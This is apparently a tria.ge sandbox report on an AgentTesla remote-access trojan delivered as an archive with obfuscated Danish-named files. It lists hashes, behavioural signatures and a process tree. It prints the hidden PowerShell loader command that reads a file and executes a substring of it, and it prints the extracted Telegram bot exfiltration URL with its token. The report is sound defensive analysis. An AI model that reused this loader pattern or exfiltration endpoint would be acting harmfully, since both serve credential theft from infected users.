Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
3attachments.zip
windows7-x64
1attachments.zip
windows10-2004-x64
1226350194-...64.rar
windows7-x64
10226350194-...64.rar
windows10-2004-x64
7226350194-...64.exe
windows7-x64
10226350194-...64.exe
windows10-2004-x64
10Civilhorto...ng.sko
windows7-x64
3Civilhorto...ng.sko
windows10-2004-x64
3Ejerkredse...31.don
windows7-x64
3Ejerkredse...31.don
windows10-2004-x64
3Ejerkredse...ng.ps1
windows7-x64
8Ejerkredse...ng.ps1
windows10-2004-x64
8Sudsers34/...se.ant
windows7-x64
3Sudsers34/...se.ant
windows10-2004-x64
3Sudsers34/...ns.oxo
windows7-x64
3Sudsers34/...ns.oxo
windows10-2004-x64
3Telekablet...st.txt
windows7-x64
1Telekablet...st.txt
windows10-2004-x64
1Analysis
-
max time kernel
90s -
max time network
90s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07/03/2024, 13:15
Static task
static1
Behavioral task
behavioral1
Sample
attachments.zip
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
attachments.zip
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
226350194-050944-sanlccjavap0003-11764.rar
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
226350194-050944-sanlccjavap0003-11764.rar
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
226350194-050944-sanlccjavap0003-11764.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
226350194-050944-sanlccjavap0003-11764.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
Ejerkredsen/Lulledes/Filateliens31.don
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
Ejerkredsen/Lulledes/Filateliens31.don
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
Ejerkredsen/Lulledes/Preconizing.ps1
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
Ejerkredsen/Lulledes/Preconizing.ps1
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
Telekablets/krakileres/miditest/Herpetotomist.txt
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
Telekablets/krakileres/miditest/Herpetotomist.txt
Resource
win10v2004-20240226-en
General
-
Target
226350194-050944-sanlccjavap0003-11764.exe
-
Size
626KB
-
MD5
0d4bb5c57ce0f99b36056892cfe87f0c
-
SHA1
bd884e9d666bce68ef23dfa139f6477f1c50f7ab
-
SHA256
0301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c
-
SHA512
7d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e
-
SSDEEP
12288:RhKVcnRerrRiJJGDktgdRYCryyqmsufs5BKGR9YWYn+4t8w:REGnReZeJGDikBrLqmZgBKgPKnt/
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1696 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2232 powershell.exe 1696 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2232 set thread context of 1696 2232 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2232 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2960 wrote to memory of 2232 2960 226350194-050944-sanlccjavap0003-11764.exe 28 PID 2960 wrote to memory of 2232 2960 226350194-050944-sanlccjavap0003-11764.exe 28 PID 2960 wrote to memory of 2232 2960 226350194-050944-sanlccjavap0003-11764.exe 28 PID 2960 wrote to memory of 2232 2960 226350194-050944-sanlccjavap0003-11764.exe 28 PID 2232 wrote to memory of 2144 2232 powershell.exe 30 PID 2232 wrote to memory of 2144 2232 powershell.exe 30 PID 2232 wrote to memory of 2144 2232 powershell.exe 30 PID 2232 wrote to memory of 2144 2232 powershell.exe 30 PID 2232 wrote to memory of 1696 2232 powershell.exe 34 PID 2232 wrote to memory of 1696 2232 powershell.exe 34 PID 2232 wrote to memory of 1696 2232 powershell.exe 34 PID 2232 wrote to memory of 1696 2232 powershell.exe 34 PID 2232 wrote to memory of 1696 2232 powershell.exe 34 PID 2232 wrote to memory of 1696 2232 powershell.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:2144
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1696
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
Filesize
348KB
MD5edac2c2f62e371a80143df8caaec5b24
SHA10b7e4c090f25b6a0ffdab3e1d4e94ea3a706584b
SHA256ae0652e2eedf1db5506d11bdf75d677c37fb7896c64435f6afdf9161235a9616
SHA512aa37fc1656f385b4a18c2cd8edd4c6befec3b9df14fb656bbc831274c4e1708e292e0e60e26470f3159d2ab1819b39594cc854428b65028bc468c43d3d12e3be
-
Filesize
57KB
MD5f5a06265c76853290d3b7ed1c1d3e7b9
SHA14083441407a629edd297d1a480a4957740b99fd1
SHA256f15289a9086ec32c0f072940209c5c50412dde5275dac49a8d271cb53e843eab
SHA51252ef36d8443eec762f2980b0ada477a9b74f0af2d0cedfb73015fbac04c28e85a85af4be6a4f67c6d7ee3b59b07abf6be2042465154ac3525e035947db15d6e8